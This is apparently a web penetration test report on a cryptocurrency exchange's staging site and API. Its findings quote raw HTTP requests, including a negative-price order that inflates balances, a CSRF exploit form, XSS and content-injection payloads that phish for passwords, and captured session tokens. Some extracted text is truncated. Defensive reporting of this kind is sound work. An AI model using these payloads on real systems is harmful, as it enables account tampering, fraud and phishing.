Penetration Testing is interesting and difficult work.
The main result of this work is Report. It can be used for Customer Presentation, Vulnerabilities Mitigation and Audit Compliance. Report is final proof of completed work and good overall score of Security Status.
2. This document contains confidential information about the IT systems and
network infrastructure of the customer, as well as information about
potential vulnerabilities and methods of their exploitation.
This confidential information is for internal use by the Customer only, and
shall not be disclosed to third parties.
Document:
Name: ______ Security Assessment report
Date: ___________
Contractor Contacts:
Role Name Email
Responsible
manager
Penetration Testing
Lead
Penetration Testing
Engineer
Penetration Testing
Engineer
Report creator
3. Table of Contents
Document: 1
Contractor Contacts: 1
Table of Contents 2
Introduction 4
Executive Summary 4
Disclaimer 5
Objectives 6
Scope of the Security Assessment 6
Methodology 7
Definitions & Abbreviations 7
Summary of Findings 9
KEY FINDINGS 12
Wrapping Balance Increase 12
CSRF Token Absence 14
Insufficient Mechanism of 2FA Reset 18
Destroying Basic Trading Panel 21
Unlimited Spam to Own Email 22
High Load Request via Create Wallet 24
High Load Request via Create Withdrawals 26
GET Content Injection via Error 29
Content Injection via Device Verification 29
Zero Withdrawal Request 31
Content Injection via POST Request 34
CORS 36
Captcha Bypass in Login 38
Logout Is Not Working Correctly 40
Full Path File Disclosure via Error 41
Captcha Bypass in WP Panel 42
Reset Token in Referer 44
Potential DoS Request 47
WP Admin Panel Accessible 48
4. HTTP Without Security Headers 49
Appendix A. WPScan results 52
Appendix В. Burp SSL Scanner 56
Appendix С. Automated Tools 58
5. Introduction
We thank Client for giving us the opportunity to conduct this Security
Assessment of their web application. This document outlines our
methodology, limitations, and results of the security assessment.
Executive Summary
ByteCode Team (Consultant) was contracted by Client (Customer) to
conduct the IT Security Assessment of their web infrastructure.
This report presents the findings of the security assessment of Client`s
Infrastructure conducted between start date- end date.
The main subject of the security assessment is Client`s exchange web
systems and APIs.
Our Security Team was engaged in activity to conduct a security assessment
of Client’s Web Application in scope. The purpose of the engagement was to
utilize active exploitation techniques in order to evaluate the security of the
web application against best practice criteria, and to validate its security
mechanisms.
4 Critical/High, 7 Medium, 5 Low and 4 Informative vulnerabilities and
errors were identified during the assessment.
According to our research after performing the security assessment, Client`s
Infrastructure was identified as Medium Secure.
6. Overall security benchmark
Medium Security
The Overall rating of Client’s Web Application, after the security assessment
by the Consultant’s Security Team, stands out to be 6 out of 10. The security
assessment was carried out following the in-house test cases, manual
methods and automated tools.
Disclaimer
This security assessment was conducted for Client`s production environment
and valid on the date of the report submission hereto. The description of
findings, recommendations, and risks were valid on the date of submission
the report hereto. Any projection to the future of the report’s information is
subject to risk due to changes in the Infrastructure architecture, and it may no
longer reflect its logic and controls.
7. Objectives
IT Infrastructure Security Assessment was conducted in a “grey box” mode
and has the following objectives:
● Identify technical and functional vulnerabilities.
● Estimate their severity level (ease of use, impact on information
systems, etc).
● Modelling the “most likely” attack vector against the Customer’s
Information System.
● Proof of concept and exploitation of vulnerabilities.
● Draw up a prioritized list of recommendations to address identified
weaknesses.
Scope of the Security Assessment
The following list of the information systems was the scope of the Security
Assessment.
# Name Description
1 https://exchange.stg.noname-client.com Web
2 https://www.noname-client.com Web
3 https://api.stg.noname-client.com API
Security Assessment start and end dates were coordinated by email
according to the following table:
8. Testing start date: start date
Testing end date: end date
Methodology
Our methodology for Security Assessment is based on our own experience,
best practices in the area of information security, international methodologies,
and guides such as PTES and OWASP.
Within the scope of this project, we have investigated the following functional
domains:
● Intelligence gathering activities against a target;
● Service detection and identification;
● Vulnerabilities detection, verification and analysis;
● Exploitation of vulnerabilities;
● Providing recommendations aimed to address a security weakness.
Definitions & Abbreviations
The level of criticality of each risk is determined based on the potential impact
of loss from successful exploitation as well as ease of exploitation, existence
of exploits in public access and other factors.
9. Risk Level Description
Critical/High
Critical and High-level vulnerabilities are easy in exploitation
and may provide an attacker with full control of the affected
systems, also may lead to significant data loss or downtime.
There are exploits or PoC available in public access.
Medium
Medium-level vulnerabilities are much harder to exploit and
may not provide the same access to affected systems. No
exploits or PoCs available in public access. Exploitation
provides only very limited access.
Low
Low-level vulnerabilities provide an attacker with information
that may assist them in conducting subsequent attacks
against target information systems or against other
information systems, which belong to an organization.
Exploitation is extremely difficult, or impact is minimal.
Info These vulnerabilities are informational and can be ignored.
10. Summary of Findings
Value Number of risks
Critical/High 4
Medium 7
Low 5
Info 4
According to the following in-depth testing of the environment, Client’s
website and web application requires some improvements.
Based on our understanding of the IT Infrastructure, as well as the nature of
the vulnerabilities discovered, their exploitability, and the potential impact we
have assessed the level of risk for your organization to be Medium.
No major design flaws were identified. Some data manipulation and
corruption mechanisms need to be investigated, also some vulnerabilities
against application and users’ security are the point of concern. The
vulnerabilities identified were the following:
“Wrapping balance increase”, “Missing CSRF token”, “Bad mechanism of
reset 2FA”, “Email spam”, “Potential Application DoS”, “Content injection” and
others.
11. Summary of Recommendations
Based on key findings we recommend to focus on the next areas:
● Validations are a crucial part of a security for the system and should be
treated as a separate system within the platform with its own structure,
well documented rules and owner. Moreover, validations should be
continuously tested and extended proactively adding new rules and
approaches. While treating it as a separate system, validations could be
included in threat modeling with allocating pain points and percentage
of covering.
● Authorisation is another critical part of the security for the platform.
Authorisation itself has a lot of vectors and places within any system
and platform. We focused on user authorisation and identification.
There are plenty of factors which influence on users trust to exchange.
Users always get tired with difficult flows which has several steps, lasts
long and require an extra effort from the user side. But in case with
authorisation user has to be sure that his money is under strong
protection. There are different approaches for authorisation, we suggest
to implement 6-digit Authenticator as a first step and initiate
authorisation cases discovery to uncover potential cases for
authorisation implementation with focus on users usability and
protection.
● Requests can jeopardize the platform if they inappropriately secured.
Each request should have CSRF-token to be secured and eliminate
danger from cyber security criminals.
Step #1.
Critical and high level issues should be fixed as soon as possible.
Additionally, these issues should be carefully investigated and remediation in
case of prevention such issues in future.
12. Medium and Low level vulnerabilities not so critical and easy to exploit, that is
why they can be fixed thereafter. Also these issues couldn’t be skipped and
should be fixed as well right after high.
Step #2.
The next step is to start with root causes of appeared issues and
development processes revision. The result of this step is setup actions which
leads to secure software development. Secure Software Development
Lifecycle is only approach to develop reliable software which operates with
money and critical users and business information.
WAF can help to prevent dozens of threats by opting for the most appropriate
one for the platform, existing infrastructure and current circumstances.
Step#3.
Penetration test is a good start for security revision. But only the test will be
not enough to be sure in system/service reliability. This step is focus on
strategy and ownership. Only when security one of the main parts of strategy
and ownership and treated as a separate service, has its roadmap, KPIs and
owner among stakeholders the system fully protected and security team
ready for any situation in our rapidly changing world.
Short list of recommendations:
● Change validation rules to prevent requests with zero or negative
balances;
● CSRF-tokens implementation;
● 6 digit real check from Authenticator;
● Restriction for confirmation emails;
● Fix implementation of captcha;
● Implement rate limit;
● Defend with properly setup WAF;
● Setup Secure SDLC processes for development team.
13. KEY FINDINGS
Risk level color map
Critical/High Medium Low Informational
The vulnerabilities presented in descending order from High to Low and separated for this
category.
Critical
Wrapping Balance Increase
#1 Description Type: Potential
The bug allows to create an order with negative price. The platform has validation for
unacceptable value, but this case was missed.
As a result, accomplishing of such order entails situation when order amount is not deducted
from the account but added:
acc_balance - (-order_price) = acc_balance+order_price
Evidences
Steps to reproduce:
1. Create order
2. Intercept request
3. Change “price”
4. Send request
Request
POST /v1/trading/orders HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/trade/LTC-USD
14. Content-Type: application/json;charset=utf-8
Content-Length: 107
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=DqowJnv0IwTjVzJ2TGoqi5w2SJ//rbxqM9nYlWPtXpZDfrEsKouj6qxDNem32gpRj7IfI
QA93vbVmVL04W6/wHmVUbD/3tivhQmFThekh2Do9umloEu0VARDmCqf;
true=aTS54OxJmH8ri2sEAAEM; io=UCqmWX6hlemWoKvKAAAT;
token=149de8155816a1c12ad22e810879e141219ed01fa44144ca9fe7dda7bc878fc00ea3a664
1158b33bf32a3804f0e6a67b3e4b8f20d885d04ae72f0e6e829ba969e
Connection: close
{"baseAsset":"LTC","quoteAsset":"USD","side":"SELL","type":"LIMIT","quantity":0.2000001,"pric
e":-123432.23}
Recommendations Implement validation on front-end and back-end side of the
platform.
15. High
CSRF Token Absence
#2 Description Type: Real
Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site,
email, blog, instant message, or program causes a user’s web browser to perform an unwanted
action on a trusted site when the user is authenticated. A CSRF attack works because browser
requests automatically include any credentials associated with the site, such as the user's
session cookie, IP address, etc. Therefore, if the user is authenticated to the site, the site
cannot distinguish between the forged or legitimate request sent by the victim. We would need
a token/identifier that is not accessible to attacker and would not be sent along (like cookies)
with forged requests that attacker initiates.
In this case the majority of requests, that make changes in account, works via PATH method,
but some requests works using POST method. at the exchange web system CSRF tokens are
absent, that it is dangerous for some functionality. For example, in request for blocking the
account we can see usage of POST method and this request doesn`t contain CSRF token.
Checking is doing via “Accent” field.There is also a possibility to restore default layout and
remove ip addresses from whitelist.
Evidences
1. Go to https://exchange.stg.noname-client.com/acc/trade-advanced
2. Make moving and resizing blocks
3. Press “Save layout”
If you open “Default layout” then you want to switch “your layout” and make change in panel
and save the changes.
16. 4. Refresh page and check that all changes was saved
5. Run exploit:
http://ec2-18-219-105-21.us-east-2.compute.amazonaws.com/csrf/noname-client/1.html
6. Refresh page and check that all settings have been reset
Exploit
<html>
<body>
<form action="https://api.stg.noname-client.com/v1/auth/preferences/trading-view-layout" method="POST" enctype="text/plain">
<input type="hidden"
name="{"xxlg":[{"h":10.5,"i":"tradingView"
,"w":32,"x":0,"y":21.5,"lastH":10.5
,"isOpen":true},{"h":7,"i":"marketsAgainstQuote
Asset","w":14,"x":17,"y":0,"lastH":7&#
44;"isOpen":true},{"h":7,"i":"openOrders",
"w":18,"x":14,"y":7,"lastH":7,"isOpen&
quot;:true},{"h":7.5,"i":"buyBox","w"
:8,"x":22,"y":14,"lastH":7.5,"isOpen"&#
58;true},{"h":7.5,"i":"sellBox","w":8&
#44;"x":8,"y":32,"lastH":7.5,"isOpen":true&#
125;,{"h":7.5,"i":"orderBook","w":16,&
quot;x":16,"y":32,"lastH":8.2,"isOpen":true}
19. Insufficient Mechanism of 2FA Reset
#3 Description Type: Real
2FA can be reset without knowing a 6-digit code. To repeat it users should be authorized and
known password for the account.
Evidences
1. Go to Registration or Authentication in Settings.
2. Enable 2FA
3. Open form for disable 2FA
4. Input real password and 6 random digits
5. 2FA will be reset without real cheks 6 digits
22. Destroying Basic Trading Panel
#4 Description Type: Real
The server does not restrict the size value of price by coin. For example user can set price of
order:
9999999999999999999999999999999999999999999999999999999999999999999999999.
If somebody buy part of this order then on this user it deal will be saved in history of deals and
light interface cannot be open. This vulnerability affects all users who perform this order.
Evidences
Request
POST /v1/trading/orders HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/trade/LTC-USD
Content-Type: application/json;charset=utf-8
Content-Length: 141
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=kXhwxa+kc2tphZjVeNoDS9jgvazz3LNzSHOjh+rxmEFUWF4nndDNxAteHDARkIjuhY
Sn6uQWs9lr0IjQQLEmO2w/Zk2DeXlWv+fqy/cMiT64++jxA0/Egl1ozo3j;
true=XvvIg55l_3jtr4uKAAEq; io=NinVPtnyFQ7jWL2nAAAo;
token=14422085d10b8916ebc68f04a7f09da6f61a41d65ae66b703c482447fa4a8b1034dd6d61
3d6893132291712a938925ad95fb6683c67a450dcc8e245b8c93a4a67
Connection: close
{"baseAsset":"LTC","quoteAsset":"USD","side":"SELL","type":"LIMIT","quantity":0.2,"price":9999
999999999999999999999999999999999999999999999}
Recommendations Implement filters of values on front-end and back-end
23. Medium
Unlimited Spam to Own Email
#5 Description Type: Real
There is possibility to send unrestricted amount of email letters on email confirmation
functionality. It can be used for email spamming and blocking by spam filters like
spamhaus.org or email exhaustion if cloud solution used for mail sending.
Evidences
24. Request
POST /v1/auth/whitelist/resend-email HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0'"><h1>loool<h1><br>
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/auth/login?confirmNewIPAddress=true
Content-Type: application/json;charset=utf-8
Content-Length: 32
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=GAqNlCerV8UMeOMVovBsHOJx3VxYmfPIUVLRwAetyONl3rE6c2RLcK+rJMuiykiYZ
q66oNnt88gsUQ1TvG6gLyyxrLYp3eEPZ5Pt1fM2a7+JQ7Ha6k1JOSLAH/oj;
true=Tk1g9GvZwuFxc91tAAA3; io=GEvW-TzXz-YfNuf1AAAz
Connection: close
{"email":"******@gmail.com"}
Recommendations 1. The amount of confirmation emails should be restricted.
2. Implement captcha
25. High Load Request via Create Wallet
#6 Description Type: Real
After verification of account user can add his or her own wallet, ex. BTC. The problem is in
unlimited quantity of wallets that will be added. After that, user can get all the wallets using
another request. Attacker can create a large number of wallets and after that it is easy to get
the list of all the wallets. As the result, DB and server will get high load.
Evidences
Steps to reproduce:
1. Go to create wallet - https://exchange.stg.noname-client.com/acc/withdrawals/BTC
2. Intercept request
3. Sent request to Intruder
4. Add payload
5. Start attack
6. After finish go to getting wallet
Request for wallet creation
POST /v1/wallet/addresses HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/withdrawal-address
Content-Type: application/json;charset=utf-8
Content-Length: 76
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=TlfNnfcVF3sjgKGB/RN1lhk3OHSACvhsOLsdGihQ/HcFWPfR7IkXRgjK/NVu3DK8XM
zyfZGB5zMQprhz1YqiaWTfOMfk0+dG4c9k0c0Qnf7BMu3oYZ3ywfpAKuzC;
true=NsuMm7LE7k9ZIf9AAABD; io=UKVw3NHSD91D3cjNAAA5;
token=1442ca0e8dfdf760feab4fe52fc9bf5b3d43280e8b6565458e5bb2aca8c8a5bee0aa12e335
c93d9e27012cf637421cefafedd5bbe45fe979ab17f2980d274f0de
Connection: close
{"name":"'"><svg onload=alert(1)>","asset":"BTC","publicAddress":"1212121"}
Request for getting wallet
26. GET /v1/wallet/addresses HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/withdrawals/BTC
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=/kfgoBZ6CItme6OC2D2a5CIAThIpk9honI2ATtrh7JrBLXDK1RIDJOBs7tbSVNgI43qx
POZPocZeS538ItsQIp9XsK2vUwWfV5L1mYetgIYGpv0/Ei3MMGZ6fFln;
true=apSOZf4fda8aPGnJAABE; io=ZOzwSRbebOiuQImXAAA6;
token=1442ca0e8dfdf760feab4fe52fc9bf5b3d43280e8b6565458e5bb2aca8c8a5bee0aa12e335
c93d9e27012cf637421cefafedd5bbe45fe979ab17f2980d274f0de
Connection: close
Recommendations 1. Implement rate limit
2. Use captcha
3. Use WAF to prevent exploiting the vulnerability
27. High Load Request via Create Withdrawals
#7 Description Type: Real
After verification of account user can add his or her own withdrawals, ex. BTC. The problem is
in unlimited quantity of withdrawals that will be added. After that, user can get all the
withdrawals using another request. Attacker can create a large number of withdrawals and
after that it is easy to get the list of all the withdrawals. As a result, DB and server will get high
load.
Evidences
Steps to reproduce:
1. Go to create withdrawals
2. Intercept request
3. Sent request to Intruder
4. Add payload
5. Start attack
6. After finish go to getting withdrawals
Request to create withdrawals
POST /v1/wallet/withdrawals HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/withdrawals/BTC
Content-Type: application/json;charset=utf-8
Content-Length: 109
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119;
AWSALB=wTPtHPwbm6573JCPT4ex5NnTlnLtnU6x2lOhsyhwkqRoBpoWmw0pS1s+58IuRnYU
xvp3/poA5sRim0pMWCQ9yN20hD+yR4Y9QyYk78Le2mBtbMVE1+0Iu6JPidfU;
true=ETB96uE-MsjnwJLbAAHd; io=EBu8AJikiCFTBgXKAACK;
token=1c06096ce54f59a5493a120ff383911c626c67fc228926f257372de0c2ba15885f4a5620ae
a80e0260aae2c65b20c22783243cfd20167c673bd74aa7e892e0bb1
Connection: close
28. {"amount":".00000000009999","destinationId":"16f1503c-425f-4fb0-b3e5-c9ec83f2318c","destin
ationType":"address"}
Request to get all withdrawals
GET /v1/wallet/withdrawals HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/withdrawals/BTC
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119;
AWSALB=8OULoKQEC93WZ3xt8o3Os32ZT1lFKW1Vg5CI6RJ8psQVlEUq32KMg2EUG9c5flX
9t2N8ewsguL05Vkka7qqQ//P76NSsxYRTNgC1pVR/dpZo7JKov5/VSAkrNJyR;
true=igEcklarKv1uxVf5AAHs; io=EBu8AJikiCFTBgXKAACK;
token=1c06096ce54f59a5493a120ff383911c626c67fc228926f257372de0c2ba15885f4a5620ae
a80e0260aae2c65b20c22783243cfd20167c673bd74aa7e892e0bb1
Connection: close
Cache-Control: max-age=0
30. GET Content Injection via Error
#8 Description Type: Real
Content injection is an attack targeting a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user-supplied data, an attacker can
supply content to a web application, typically via a parameter value, that is reflected back to the
user. This presents the user with a modified page under the context of the trusted domain.
This attack is typically used as, or in conjunction with, social engineering because the attack is
exploiting a code-based vulnerability and a user's trust. As a side note, this attack is widely
misunderstood as a kind of bug that brings no impact.
Evidences
Go to link with payload
https://api.stg.noname-client.com/v1/trading/admin/admin/all-orders-------------------------------------
-----------------------------SEND_ME_YOUR_PASSWORD_TO_hacker@gmail.com
Recommendations ● Add CSRF tokens into headers
● Check header for payload possibility
Content Injection via Device Verification
#9 Description Type: Real
Content injection is an attack targeting a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user-supplied data, an attacker can
supply content to a web application, typically via a parameter value, that is reflected back to the
user. This presents the user with a modified page under the context of the trusted domain.
31. This attack is typically used as, or in conjunction with, social engineering because the attack is
exploiting a code-based vulnerability and a user's trust. This attack is widely misunderstood as a
kind of bug that brings no impact.
Evidences
1. Go to Email verification and turn it on
2. Intercept request
3. Inject into User-Agent payload
4. Send request with injection
Request:
POST /v1/auth/whitelist/resend-email HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
------------------------------------------------------------ ------------------------------------------------------------
SEND ME YOUR PASSWORD TO hacker@gmail.com
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/auth/login?confirmNewIPAddress=true
Content-Type: application/json;charset=utf-8
Content-Length: 34
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=/MxFNBGDQwY9BeWEeF/mA7Nq3UuCv4DwRvDZgMo64AAcUVG9UnC8dEICZGE
xM9oTCOwYmVHvffZsZTd55VWZO4lmjuV+iIRISudFRlHpszAYnvygY8Tgxd4O4kIE;
true=U5EPzUvWc7auG2jFAAC2; io=PVsDDNeqtTipGuvgAABx
Connection: close
{"email":"hacker@gmail.com"}
Email with injection:
32. Recommendations Add CSRF tokens into headers
Checks header for payload possibility
Zero Withdrawal Request
#10 Description Type: Potential
User can make a withdrawal with zero balances. Potentially this may lead to vulnerability
rounding and balance increase.
35. Recommendations Disable the possibility of sending a request with zero or
negative balances
Content Injection via POST Request
#11 Description Type: Real
Content injection is an attack targeting a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user-supplied data, an attacker can
supply content to a web application, typically via a parameter value, that is reflected back to the
user. This presents the user with a modified page under the context of the trusted domain.
This attack is typically used as, or in conjunction with, social engineering because the attack is
exploiting a code-based vulnerability and a user's trust. As a side note, this attack is widely
misunderstood as a kind of bug that brings no impact.
37. ● Checks header for payload possibility
CORS
#12 Description Type: Real
An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content
running on other domains can perform two-way interaction with the domain that publishes the
policy. The policy is fine-grained and can apply access controls per-request based on the URL
and other features of the request.
Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way
interaction by third-party web sites. Unless the response consists only of unprotected public
content, this policy is likely to present a security risk.
If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be
able to carry out privileged actions and retrieve sensitive information. Even if it does not,
attackers may be able to bypass any IP-based access controls by proxying through users'
browsers.
Evidences
Request:
GET /markets/subscribe/?EIO=3&transport=polling&t=Ml_3pLH HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://vulnerable
Connection: close
Referer: https://exchange.stg.noname-client.com/acc/trade/BTC-USD
Cookie:
AWSALB=rsIaGSR16bdF7LOQf7TjY3TzHXZiOJ2+IKL0w4H31gUolDbsncWYjfGJvooo4y0VcD
WGlZhYSUhqDkqoDlFHQ10BhMosw+Urkj2EM6qH6Mfu6wzmPcySXMNpkrsU;
true=z-VzqNGCsZ_ptJvCAAJP;
token=1494ae162d651b9d160c116af0e1080a0a5fb56709bf99913da8511d2ac023dbb980bcdc
4c8fced29e52540aa7f2c859c3395b31d59284ea9c3f7e1951730f692;
io=h_ZVauUYv9jbEt-IAACx; privacyPolicyAccepted=true
39. Recommendations Rather than using a wildcard or programmatically verifying
supplied origins, use a whitelist of trusted domains.
Low
Captcha Bypass in Login
#13
Description:
Captcha avoiding while account authorisation
Type: Real
Steps to reproduce
Authorisation page (https://exchange.demo.noname-client.com/auth/login) requires credentials
and captcha. According to an authorisation flow: the system sends first request with
successfully validated login pass and captcha, then ask for 6-digit code and sends a second
request with login, password and code without captcha. With second request could be made
40. password brute force or authorisation in many accounts bypassing captcha.
Evidences ● api.demo.noname-client.com
Request
System sends authorisation request without captcha and receives proper respond.
POST /v1/auth/mfa/otp/verify HTTP/1.1
Host: api.demo.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.demo.noname-client.com/auth/login
Content-Type: application/json;charset=utf-8
Content-Length: 78
Origin: https://exchange.demo.noname-client.com
41. Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=IAaIq6rjI+fCT0Q2JU+ptKY5RyGMVaKEZ5qF5NmNalX572ymW4m0i453x9XXfEYcq
ZIhXuSzQlMYRMbaUoRG8Hs1U7pMw4G2dQrXdDBcvSWmlvby1OrddH3/OkEZ;
true=uJjVRG2YJXW0oGZXAAA3; io=udw_bkPzxH7se7GlAAEN
Connection: close
{"email":"********@gmail.com","password":"QQqq1111111111!!","code":"1111"}
Recommendations Implement Captcha usage properly.
Logout Is Not Working Correctly
#14 Description Type: Real
A session continues being active after logging out.
Evidences
Request for checking deactivated session. 14:50 9072019
GET /v1/auth/me HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/profile
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=2s7lm2Pg4Cdrqib9pUqeJy5dkujiRjgRqo1Lvx5oQChv+xpXtn7cxiYCD+NIx0Y7FEn9Y
ENfMNma0WWK2Ft5NQXhLgfhNujk7oHEJz7nVh3x1iJ2oezNacBACowG;
token=1644b043e93e70c84aee97b6fd91cd73cb2b059a9ff801d772bdcf67d87d15b2b7b820e45
d6410901e7e190cf54a41308eed1fe539b58e4b550a00eeacfcf1bce;
true=5yh8oosie2zDF-piAAAb; io=i6Wh88Q0FwNldeGDAAAK
Connection: close
Recommendations This situation occurs due to using standard cookies. It’s better
to use Bear header instead of standard cookies.
42. Full Path File Disclosure via Error
#15 Description Type: Real
A stack trace is an information leak, which reveals information about your implementation.
Whilst not a serious vulnerability, it does allow an attacker to gain certain information about your
system. It may also allow them to use a debugging-based approach to exploiting flaws in your
site. Ignoring the security implications, it's not exactly confidence-inducing for your customers to
see a stacktrace. They'll assume the site is broken (which it is, really) and worry about whether
their transaction will work, or perhaps even think that the site has been hacked.
Evidences
Steps to reproduce:
1. Intercept request
2. Add any payload
3. Send request
Request
POST /privacy-policy-2/ HTTP/1.1
Content-Length: 184
Content-Type: application/x-www-form-urlencoded
Referer: https://www.noname-client.com
Cookie: wordpress_test_cookie=WP+Cookie+check;
gtm4wp_last_weatherstatus=Openweathermap.org+returned+status+code%3A+401;
_ga=GA1.2.1756489029.1562755313; _gid=GA1.2.1075917586.1562755313; _gat=1;
cookie_notice_accepted=true; _gat_UA-138684338-1=1
Host: www.noname-client.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
g-recaptcha-response[]=1&pum_form_popup_id=495&your-email=sample%40email.tst&_wpcf7
=421&_wpcf7_container_post=0&_wpcf7_locale=en_GB&_wpcf7_unit_tag=wpcf7-f421-o1&_w
pcf7_version=5.1.3
Part of response
43. <br />
<b>Warning</b>: trim() expects parameter 1 to be string, array given in
<b>/home/noname-client87/public_html/wp-content/plugins/contact-form-7/modules/recaptcha.
php</b> on line <b>146</b><br />
Recommendations Prevent this information from being displayed to the user.
This can be done in PHP's php.ini file or in Apache's
httpd.conf file:
php.ini: display_errors = 'off'
apache2.conf: php_flag display_errors off
Captcha Bypass in WP Panel
#16 Description Type: Real
The g-recaptcha-response is not validated on the server-side when submitting a
Password reset form to the endpoint. It can lead to email/user enumerations.
44. Evidences
Steps to reproduce:
1. Go to page “Reset password”
(https://www.noname-client.com/wp-login.php?action=lostpassword)
2. Intercept request
3. Send request to repeater
4. Send password again at any time
Request:
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: www.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.noname-client.com/wp-login.php?action=lostpassword
Content-Type: application/x-www-form-urlencoded
Content-Length: 410
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
_hjIncludedInSample=1; cookie_notice_accepted=true;
wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1
user_login=123&g-recaptcha-response=03AOLTBLTk9LlGyMl2eQhuhy0DFobQzLDXUf87flO3
Cs3qIEeHGigI-V-GjRHECGmTYBvm5gzzxdbU0ZizskCS2jdHBXyS8773-lRlHOOVlDIilKKS8Cp
8Q5Rto8ADcvj5MxrF5E0bLivy-IEUmPzx65njY9ROWxG4DAsTxcf9iDf9e8xCfDThMpzDb10jCb
45. b8sgHs-euYvfYP84gfr6MLznQAmfDEp2jHZS45xGPCvPri0BAhtvRHdpPptvHgyBo_XH4wlp-FR
zpU3fDOtYVMvdY6m3Vx3H1jfKDiR6jbDjPsHS-o_9OoHCwY12R-8EhzApmPVO-meG0_&redir
